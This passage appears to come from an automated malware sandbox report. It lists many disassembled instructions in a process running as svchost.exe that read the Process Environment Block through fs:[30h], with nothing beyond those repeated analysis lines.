          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]1_2_0303262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]1_2_0304C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]1_2_03062674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]1_2_0306C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]1_2_030666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0306A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]1_2_0306A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6500 mov eax, dword ptr fs:[00000030h]1_2_030C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov eax, dword ptr fs:[00000030h]1_2_03032582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov ecx, dword ptr fs:[00000030h]1_2_03032582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064588 mov eax, dword ptr fs:[00000030h]1_2_03064588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E59C mov eax, dword ptr fs:[00000030h]1_2_0306E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030365D0 mov eax, dword ptr fs:[00000030h]1_2_030365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030325E0 mov eax, dword ptr fs:[00000030h]1_2_030325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C427 mov eax, dword ptr fs:[00000030h]1_2_0302C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA456 mov eax, dword ptr fs:[00000030h]1_2_030EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302645D mov eax, dword ptr fs:[00000030h]1_2_0302645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305245A mov eax, dword ptr fs:[00000030h]1_2_0305245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC460 mov ecx, dword ptr fs:[00000030h]1_2_030BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA49A mov eax, dword ptr fs:[00000030h]1_2_030EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030364AB mov eax, dword ptr fs:[00000030h]1_2_030364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030644B0 mov ecx, dword ptr fs:[00000030h]1_2_030644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BA4B0 mov eax, dword ptr fs:[00000030h]1_2_030BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030304E5 mov ecx, dword ptr fs:[00000030h]1_2_030304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104B00 mov eax, dword ptr fs:[00000030h]1_2_03104B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB40 mov eax, dword ptr fs:[00000030h]1_2_030FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D8B42 mov eax, dword ptr fs:[00000030h]1_2_030D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028B50 mov eax, dword ptr fs:[00000030h]1_2_03028B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEB50 mov eax, dword ptr fs:[00000030h]1_2_030DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CB7E mov eax, dword ptr fs:[00000030h]1_2_0302CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]1_2_030E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]1_2_030E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEBD0 mov eax, dword ptr fs:[00000030h]1_2_030DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EBFC mov eax, dword ptr fs:[00000030h]1_2_0305EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BCBF0 mov eax, dword ptr fs:[00000030h]1_2_030BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BCA11 mov eax, dword ptr fs:[00000030h]1_2_030BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA24 mov eax, dword ptr fs:[00000030h]1_2_0306CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EA2E mov eax, dword ptr fs:[00000030h]1_2_0305EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]1_2_03054A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]1_2_03054A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]1_2_03040A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]1_2_03040A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEA60 mov eax, dword ptr fs:[00000030h]1_2_030DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]1_2_030ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]1_2_030ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104A80 mov eax, dword ptr fs:[00000030h]1_2_03104A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068A90 mov edx, dword ptr fs:[00000030h]1_2_03068A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]1_2_03038AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]1_2_03038AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086AA4 mov eax, dword ptr fs:[00000030h]1_2_03086AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030AD0 mov eax, dword ptr fs:[00000030h]1_2_03030AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]1_2_03064AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]1_2_03064AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]1_2_0306AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]1_2_0306AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]1_2_030AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]1_2_030AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC912 mov eax, dword ptr fs:[00000030h]1_2_030BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]1_2_03028918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]1_2_03028918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B892A mov eax, dword ptr fs:[00000030h]1_2_030B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C892B mov eax, dword ptr fs:[00000030h]1_2_030C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0946 mov eax, dword ptr fs:[00000030h]1_2_030B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104940 mov eax, dword ptr fs:[00000030h]1_2_03104940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]1_2_0307096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E mov edx, dword ptr fs:[00000030h]1_2_0307096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]1_2_0307096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]1_2_030D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]1_2_030D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC97C mov eax, dword ptr fs:[00000030h]1_2_030BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]1_2_030309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]1_2_030309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov esi, dword ptr fs:[00000030h]1_2_030B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]1_2_030B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]1_2_030B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C69C0 mov eax, dword ptr fs:[00000030h]1_2_030C69C0
